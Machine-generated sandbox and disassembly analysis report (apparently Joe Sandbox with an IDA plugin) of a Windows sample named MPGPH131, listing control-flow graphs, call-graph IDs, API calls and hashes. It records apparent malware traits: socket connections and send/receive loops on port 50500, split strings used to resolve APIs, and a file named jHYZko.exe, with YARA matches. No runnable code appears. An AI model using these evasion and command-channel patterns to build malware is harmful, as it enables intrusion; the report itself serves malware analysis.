23071->23081 23082 664c52 23073->23082 23076 664ede TlsSetValue 23077 6637d4 23077->23056 23077->23058 23078->23052 23079->23056 23080->23071 23081->23056 23083 664c82 23082->23083 23084 664c7e 23082->23084 23083->23084 23089 664b87 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary std::_Lockit::_Lockit 23083->23089 23084->23076 23084->23077 23086 664c96 23086->23084 23087 664c9c GetProcAddress 23086->23087 23087->23084 23088 664cac std::_Lockit::_Lockit 23087->23088 23088->23084 23089->23086 23090 656658 23091 65666b ___std_exception_copy 23090->23091 23096 656533 23091->23096 23093 656677 23107 651f4c 39 API calls ___std_exception_copy 23093->23107 23095 656683 23097 65653f std::locale::_Setgloballocale 23096->23097 23098 65656c 23097->23098 23099 656549 23097->23099 23106 656564 23098->23106 23108 65a800 RtlEnterCriticalSection 23098->23108 23123 652193 39 API calls 2 library calls 23099->23123 23102 65658a 23109 6565ca 23102->23109 23104 656597 23124 6565c2 RtlLeaveCriticalSection 23104->23124 23106->23093 23107->23095 23108->23102 23110 6565d7 23109->23110 23112 6565fa 23109->23112 23136 652193 39 API calls 2 library calls 23110->23136 23113 653041 72 API calls 23112->23113 23114 6565f2 23112->23114 23115 656612 23113->23115 23114->23104 23125 66485d 23115->23125 23118 6639f2 39 API calls 23119 656626 23118->23119 23129 6624af 23119->23129 23123->23106 23124->23106 23126 664874 23125->23126 23127 65661a 23125->23127 23126->23127 23138 664823 14 API calls __dosmaperr 23126->23138 23127->23118 23130 6624d8 23129->23130 23135 65662d 23129->23135 23131 662527 23130->23131 23133 6624ff 23130->23133 23147 652193 39 API calls 2 library calls 23131->23147 23139 66241e 23133->23139 23135->23114 23137 664823 14 API calls __dosmaperr 23135->23137 23136->23114 23137->23114 23138->23127 23140 66242a std::locale::_Setgloballocale 23139->23140 23148 667ed2 RtlEnterCriticalSection 23140->23148 23142 662438 23144 662469 23142->23144 23149 662582 23142->23149 23162 6624a3 RtlLeaveCriticalSection 23144->23162 23146 66248c 23146->23135 23147->23135 23148->23142 23150 66814e 39 API calls 23149->23150 23152 662592 23150->23152 23151 662598 23163 6680bd 15 API calls __dosmaperr 23151->23163 23152->23151 23153 6625ca 23152->23153 23155 66814e 39 API calls 23152->23155 23153->23151 23156 66814e 39 API calls 23153->23156 23157 6625c1 23155->23157 23158 6625d6 FindCloseChangeNotification 23156->23158 23159 66814e 39 API calls 23157->23159 23158->23151 23160 6625e2 GetLastError 23158->23160 23159->23153 23160->23151 23161 6625f0 23161->23144 23162->23146 23163->23161 23164 65abd8 23165 65abeb ___std_exception_copy 23164->23165 23170 65a9ba 23165->23170 23167 65ac00 23178 651f4c 39 API calls ___std_exception_copy 23167->23178 23169 65ac0d 23171 65a9c8 23170->23171 23177 65a9f0 23170->23177 23172 65a9d5 23171->23172 23173 65a9f7 23171->23173 23171->23177 23187 652193 39 API calls 2 library calls 23172->23187 23179 65a913 23173->23179 23177->23167 23178->23169 23180 65a91f std::locale::_Setgloballocale 23179->23180 23188 65a800 RtlEnterCriticalSection 23180->23188 23182 65a92d 23189 65a96e 23182->23189 23186 65a94b 23186->23167 23187->23177 23188->23182 23197 6660b3 23189->23197 23195 65a93a 23196 65a962 RtlLeaveCriticalSection 23195->23196 23196->23186 23214 666075 23197->23214 23199 6660c4 23200 65a986 23199->23200 23221 66489d 15 API calls 2 library calls 23199->23221 23204 65aa31 23200->23204 23202 66611d 23222 664823 14 API calls __dosmaperr 23202->23222 23205 65a9a4 23204->23205 23207 65aa43 23204->23207 23213 66615e 72 API calls 23205->23213 23206 65aa51 23223 652193 39 API calls 2 library calls 23206->23223 23207->23205 23207->23206 23209 65aa87 std::locale::_Locimp::_Locimp 23207->23209 23209->23205 23210 653041 72 API calls 23209->23210 23211 6639f2 39 API calls 23209->23211 23212 662dfb 72 API calls 23209->23212 23210->23209 23211->23209 23212->23209 23213->23195 23215 666081 23214->23215 23216 6660ab 23215->23216 23217 6639f2 39 API calls 23215->23217 23216->23199 23218 66609c 23217->23218 23219 66e7b4 39 API calls 23218->23219 23220 6660a2 23219->23220 23220->23199 23221->23202 23222->23200 23223->23205 23263 66dd9b 51 API calls 3 library calls

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 109a044-109a074 GetPEB 1 109a077-109a09a 0->1 2 109a09d-109a0a0 1->2 3 109a1ee-109a22b CreateFileA 2->3 4 109a0a6-109a0bc 2->4 25 109a22d-109a230 3->25 26 109a265-109a269 3->26 5 109a0be-109a0c5 4->5 6 109a110-109a116 4->6 5->6 7 109a0c7-109a0ce 5->7 9 109a129-109a12f 6->9 10 109a118-109a11f 6->10 7->6 11 109a0d0-109a0d7 7->11 13 109a148-109a14e 9->13 14 109a131-109a138 9->14 10->9 12 109a121-109a124 10->12 11->6 15 109a0d9-109a0dd 11->15 17 109a1bb-109a1c0 12->17 19 109a150-109a157 13->19 20 109a167-109a16f 13->20 14->13 18 109a13a-109a141 14->18 15->6 22 109a0df-109a0e3 15->22 28 109a1e0-109a1e9 17->28 29 109a1c2-109a1c5 17->29 18->13 27 109a143-109a146 18->27 19->20 21 109a159-109a160 19->21 23 109a188-109a18e 20->23 24 109a171-109a178 20->24 21->20 30 109a162-109a165 21->30 22->17 31 109a0e9-109a10b 22->31 33 109a190-109a197 23->33 34 109a1a7-109a1ad 23->34 24->23 32 109a17a-109a181 24->32 35 109a232-109a238 25->35 27->17 28->2 29->28 36 109a1c7-109a1ca 29->36 30->17 31->1 32->23 38 109a183-109a186 32->38 33->34 39 109a199-109a1a0 33->39 34->17 40 109a1af-109a1b6 34->40 41 109a23a-109a242 35->41 42 109a246-109a251 35->42 36->28 37 109a1cc-109a1cf 36->37 37->28 43 109a1d1-109a1d4 37->43 38->17 39->34 45 109a1a2-109a1a5 39->45 40->17 46 109a1b8 40->46 41->35 47 109a244 41->47 48 109a255-109a261 42->48 43->28 49 109a1d6-109a1d9 43->49 45->17 46->17 47->48 48->26 49->28 50 109a1db-109a1de 49->50 50->3 50->28
                                  APIs
                                  • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0109A223
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$jHYZko.exe$lstr$odul
                                  • API String ID: 823142352-2918638317
                                  • Opcode ID: b0741232f62294ee7c76ea7234fdb84e32d0b0c94cc463ad72419914e2c9c994
                                  • Instruction ID: d3f3f8a63ac02c8ff0457c9edaca4e9d9848a01bee70ee05101bcf4be828cf60
                                  • Opcode Fuzzy Hash: b0741232f62294ee7c76ea7234fdb84e32d0b0c94cc463ad72419914e2c9c994
                                  • Instruction Fuzzy Hash: 2D6160B4E01215DFCF65CF98C8A4AADFBF0BF48355F1482AAD585AB211C3309A81DF91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 52 58ec20-58ec58 53 58ec5e 52->53 54 58f0bf-58f0d3 52->54 55 58ec64-58ec6c 53->55 56 58ec6e-58ec94 call 58db60 55->56 57 58eca7-58ecf0 setsockopt recv WSAGetLastError 55->57 62 58ec99-58eca1 56->62 57->54 58 58ecf6-58ecf9 57->58 60 58ecff-58ed53 call 5d8610 recv 58->60 61 58f037-58f053 call 584a90 58->61 73 58ed59-58ed74 recv 60->73 74 58efe4-58eff1 60->74 68 58f09c-58f0a4 Sleep 61->68 69 58f055 61->69 62->57 65 58f0aa-58f0b9 Sleep 62->65 65->54 65->55 68->65 71 58f05f-58f086 call 58e060 69->71 72 58f057-58f05d 69->72 78 58f08b-58f097 71->78 72->68 72->71 73->74 76 58ed7a-58edb1 73->76 74->68 77 58eff7-58f003 74->77 79 58edb3-58ee11 call 5d8610 setsockopt recv 76->79 80 58ee14-58ee44 call 5d5d50 76->80 81 58f019-58f023 call 64cf83 77->81 82 58f005-58f013 77->82 78->68 79->80 89 58ee4a 80->89 90 58ef64-58efb3 call 58e460 80->90 81->68 82->81 92 58ee50-58ef5e 89->92 90->74 96 58efb5-58efc4 90->96 92->90 97 58efda-58efe1 call 64cf83 96->97 98 58efc6-58efd4 96->98 97->74 98->97
                                  APIs
                                  • setsockopt.WS2_32(00000320,0000FFFF,00001006,?,00000008), ref: 0058ECC6
                                  • recv.WS2_32(?,00000004,00000002), ref: 0058ECE1
                                  • WSAGetLastError.WS2_32 ref: 0058ECE5
                                  • recv.WS2_32(00000000,0000000C,00000002,0000000C), ref: 0058ED4E
                                  • recv.WS2_32(00000000,0000000C,00000008), ref: 0058ED6F
                                  • setsockopt.WS2_32(0000FFFF,00001006,?,00000008,?), ref: 0058EDEB
                                  • recv.WS2_32(00000000,?,00000008), ref: 0058EE0C
                                    • Part of subcall function 0058DB60: WSAStartup.WS2_32 ref: 0058DB8A
                                    • Part of subcall function 0058DB60: getaddrinfo.WS2_32(?,?,?,50500), ref: 0058DC0C
                                    • Part of subcall function 0058DB60: socket.WS2_32(?,?,?), ref: 0058DC2D
                                    • Part of subcall function 0058DB60: connect.WS2_32(00000000,?,?), ref: 0058DC41
                                    • Part of subcall function 0058DB60: closesocket.WS2_32(00000000), ref: 0058DC4D
                                    • Part of subcall function 0058DB60: FreeAddrInfoW.WS2_32(?), ref: 0058DC5A
                                    • Part of subcall function 0058DB60: WSACleanup.WS2_32 ref: 0058DC60
                                  • recv.WS2_32(?,00000004,00000008), ref: 0058F033
                                  • Sleep.KERNELBASE(00000001), ref: 0058F09E
                                  • Sleep.KERNELBASE(00000064), ref: 0058F0AC
                                  • __Mtx_unlock.LIBCPMT ref: 0058F211
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: recv$Sleepsetsockopt$AddrCleanupErrorFreeInfoLastMtx_unlockStartupclosesocketconnectgetaddrinfosocket
                                  • String ID: 50500
                                  • API String ID: 1335176318-2230786414
                                  • Opcode ID: 7a95452be8162fa7045812c26332ed3c760b804d3ef82751955d1b3e08b761e2
                                  • Instruction ID: e815da0b8745a4523305507f403edeecbc16e5074be9bf3367977a054ed3e852
                                  • Opcode Fuzzy Hash: 7a95452be8162fa7045812c26332ed3c760b804d3ef82751955d1b3e08b761e2
                                  • Instruction Fuzzy Hash: 88B1BF31D00259DFEB24EBA8CC45BADBBB6FB45310F248219E945AB292D770A985CF50

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 101 58db60-58db92 WSAStartup 102 58db98-58dbc2 call 577d20 * 2 101->102 103 58dc66-58dc6f 101->103 108 58dbce-58dc14 getaddrinfo 102->108 109 58dbc4-58dbc8 102->109 110 58dc60 WSACleanup 108->110 111 58dc16-58dc1c 108->111 109->103 109->108 110->103 112 58dc1e 111->112 113 58dc74-58dc7e FreeAddrInfoW 111->113 115 58dc24-58dc38 socket 112->115 113->110 114 58dc80-58dc88 113->114 115->110 116 58dc3a-58dc4a connect 115->116 117 58dc4c-58dc54 closesocket 116->117 118 58dc70 116->118 117->115 119 58dc56-58dc5a FreeAddrInfoW 117->119 118->113 119->110
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddrFreeInfo$CleanupStartupclosesocketconnectgetaddrinfosocket
                                  • String ID: 50500
                                  • API String ID: 448659506-2230786414
                                  • Opcode ID: 71c2dfe965736fb8724f25d7adb44225312b6f1d8b3fa28f41d294ecadd26a87
                                  • Instruction ID: a52701d7bfc6585b2b9b6cbe7c7c4f636c4e0ae16b54ff5062cd3c14212df4c3
                                  • Opcode Fuzzy Hash: 71c2dfe965736fb8724f25d7adb44225312b6f1d8b3fa28f41d294ecadd26a87
                                  • Instruction Fuzzy Hash: 533180725047049BD7209F28EC48A2ABBF5FB89734F04471DF8A9A22E0D3719D448BA2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 120 58e060-58e0af call 5d5d50 123 58e1d4-58e20a call 5d5bd0 120->123 124 58e0b5-58e0b8 120->124 133 58e238-58e26c call 577d20 123->133 134 58e20c-58e218 123->134 125 58e0c0-58e0e6 124->125 127 58e0f8-58e107 125->127 128 58e0e8-58e0f3 125->128 131 58e109-58e112 127->131 132 58e117-58e123 127->132 130 58e1c7 128->130 135 58e1ca-58e1ce 130->135 131->130 136 58e133-58e13f 132->136 137 58e125-58e12e 132->137 146 58e26e-58e280 133->146 147 58e282-58e28a call 5d8610 133->147 138 58e21a-58e228 134->138 139 58e22e-58e235 call 64cf83 134->139 135->123 135->125 141 58e14c-58e158 136->141 142 58e141-58e14a 136->142 137->130 138->139 143 58e44b call 652220 138->143 139->133 149 58e15a-58e163 141->149 150 58e165-58e171 141->150 142->130 154 58e450-58e455 call 652220 143->154 152 58e28f-58e2e2 call 577d20 * 2 146->152 147->152 149->130 155 58e17e-58e18a 150->155 156 58e173-58e17c 150->156 168 58e2e4-58e313 call 577d20 call 64e9e0 152->168 169 58e316-58e32c call 577d20 152->169 159 58e18c-58e195 155->159 160 58e197-58e1a3 155->160 156->130 159->130 161 58e1b0-58e1b9 160->161 162 58e1a5-58e1ae 160->162 161->135 165 58e1bb-58e1c3 161->165 162->130 165->130 168->169 174 58e332-58e338 169->174 175 58e3b7 169->175 177 58e340-58e36c 174->177 178 58e3bb-58e3c1 175->178 180 58e370-58e37b 177->180 181 58e3eb-58e403 178->181 182 58e3c3-58e3cf 178->182 180->180 183 58e37d-58e3ab GetModuleHandleA GetProcAddress WSASend 180->183 186 58e435-58e44a 181->186 187 58e405-58e411 181->187 184 58e3e1-58e3e8 call 64cf83 182->184 185 58e3d1-58e3df 182->185 188 58e3ad-58e3b5 183->188 189 58e425-58e429 183->189 184->181 185->154 185->184 191 58e42b-58e432 call 64cf83 187->191 192 58e413-58e421 187->192 188->175 188->177 189->178 191->186 192->154 195 58e423 192->195 195->191
                                  APIs
                                  • GetModuleHandleA.KERNEL32(Ws2_32.dll,?,?,?,?,006747E8,00000000,00000000,-006A65B0), ref: 0058E386
                                  • GetProcAddress.KERNEL32(00000000,89988B80), ref: 0058E391
                                  • WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,006747E8,00000000,00000000,-006A65B0), ref: 0058E3A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProcSend
                                  • String ID: 131$50500$Ws2_32.dll
                                  • API String ID: 2819740048-3512819870
                                  • Opcode ID: 79abfe181a1b7f47e359e24d0f1e7fe03b7a4d0757b7eb4621063c4ec8951961
                                  • Instruction ID: 773a88c789b21797d8cd8a8a6ca378d48c499a15bb34424cad8719558783aeba
                                  • Opcode Fuzzy Hash: 79abfe181a1b7f47e359e24d0f1e7fe03b7a4d0757b7eb4621063c4ec8951961
                                  • Instruction Fuzzy Hash: 04D1DF30A04248DFDB14DFA8CC55BADBFB5BF46310F684258D855BB292EB709886CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 197 662f0c-662f2e 198 662f34-662f36 197->198 199 663121 197->199 200 662f62-662f85 198->200 201 662f38-662f57 call 652193 198->201 202 663123-663127 199->202 204 662f87-662f89 200->204 205 662f8b-662f91 200->205 208 662f5a-662f5d 201->208 204->205 207 662f93-662fa4 204->207 205->201 205->207 209 662fa6-662fb4 call 65bbed 207->209 210 662fb7-662fc7 call 662a51 207->210 208->202 209->210 215 663010-663022 210->215 216 662fc9-662fcf 210->216 217 663024-66302a 215->217 218 663079-663099 WriteFile 215->218 219 662fd1-662fd4 216->219 220 662ff8-66300e call 662622 216->220 226 663065-663077 call 662ace 217->226 227 66302c-66302f 217->227 223 6630a4 218->223 224 66309b-6630a1 GetLastError 218->224 221 662fd6-662fd9 219->221 222 662fdf-662fee call 6629e9 219->222 238 662ff1-662ff3 220->238 221->222 228 6630b9-6630bc 221->228 222->238 232 6630a7-6630b2 223->232 224->223 244 66304c-66304f 226->244 233 663051-663063 call 662c92 227->233 234 663031-663034 227->234 241 6630bf-6630c1 228->241 239 6630b4-6630b7 232->239 240 66311c-66311f 232->240 233->244 234->241 242 66303a-663047 call 662ba9 234->242 238->232 239->228 240->202 245 6630c3-6630c8 241->245 246 6630ef-6630fb 241->246 242->244 244->238 250 6630e1-6630ea call 65ac78 245->250 251 6630ca-6630dc 245->251 248 663105-663117 246->248 249 6630fd-663103 246->249 248->208 249->199 249->248 250->208 251->208
                                  APIs
                                    • Part of subcall function 00662622: GetConsoleOutputCP.KERNEL32(FAAA2064,00000000,00000000,?), ref: 00662685
                                  • WriteFile.KERNELBASE(?,00000000,00656AF7,?,00000000,00000000,00000000,?,00000000,?,0064C023,00656AF7,00000000,0064C023,?,?), ref: 00663091
                                  • GetLastError.KERNEL32(?,00656AF7,00000000,?,0064C023,?,00000000,00000000), ref: 0066309B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ConsoleErrorFileLastOutputWrite
                                  • String ID:
                                  • API String ID: 2915228174-0
                                  • Opcode ID: 27c8a632ea7d98b2da3662cb89c9c5c226481453b3700f3a444dd9015b3e9162
                                  • Instruction ID: 5b5f11e3b0590da269495c1a731a8f18ceba35c0f1e33cc677a4cf5ed1ee4aff
                                  • Opcode Fuzzy Hash: 27c8a632ea7d98b2da3662cb89c9c5c226481453b3700f3a444dd9015b3e9162
                                  • Instruction Fuzzy Hash: 9661C671D0411AAFDF11DFA8C844AEEBBBABF19304F140149E904AB352D772DA55DB60

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 254 662582-662596 call 66814e 257 66259c-6625a4 254->257 258 662598-66259a 254->258 260 6625a6-6625ad 257->260 261 6625af-6625b2 257->261 259 6625ea-66260a call 6680bd 258->259 271 66261c 259->271 272 66260c-66261a call 65ac78 259->272 260->261 262 6625ba-6625ce call 66814e * 2 260->262 263 6625b4-6625b8 261->263 264 6625d0-6625e0 call 66814e FindCloseChangeNotification 261->264 262->258 262->264 263->262 263->264 264->258 275 6625e2-6625e8 GetLastError 264->275 273 66261e-662621 271->273 272->273 275->259
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00662469,00000000,CF830579,006A1148,0000000C,00662525,0065662D,?), ref: 006625D8
                                  • GetLastError.KERNEL32(?,00662469,00000000,CF830579,006A1148,0000000C,00662525,0065662D,?), ref: 006625E2
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ChangeCloseErrorFindLastNotification
                                  • String ID:
                                  • API String ID: 1687624791-0
                                  • Opcode ID: ac139754206ef6a4f04e01a0d79e839cece2d15668b25600798fdd21571bf296
                                  • Instruction ID: 8e4e21666f555b46426f551e16525f4de65adcc631d7b759068d580670940aa6
                                  • Opcode Fuzzy Hash: ac139754206ef6a4f04e01a0d79e839cece2d15668b25600798fdd21571bf296
                                  • Instruction Fuzzy Hash: C2116B336005515BC73463749C797BD674B9B87734F24030DFD0A8B2D2DE7198C28256

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 279 65bacc-65bae4 call 66814e 282 65bae6-65baed 279->282 283 65bafa-65bb10 SetFilePointerEx 279->283 284 65baf4-65baf8 282->284 285 65bb25-65bb2f 283->285 286 65bb12-65bb23 GetLastError call 65ac78 283->286 287 65bb4b-65bb4e 284->287 285->284 289 65bb31-65bb46 285->289 286->284 289->287
                                  APIs
                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,006A0E00,0064C023,00000002,0064C023,00000000,?,?,?,0065BBD6,00000000,?,0064C023,00000002,006A0E00), ref: 0065BB08
                                  • GetLastError.KERNEL32(0064C023,?,?,?,0065BBD6,00000000,?,0064C023,00000002,006A0E00,00000000,0064C023,00000000,006A0E00,0000000C,00656BCE), ref: 0065BB15
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
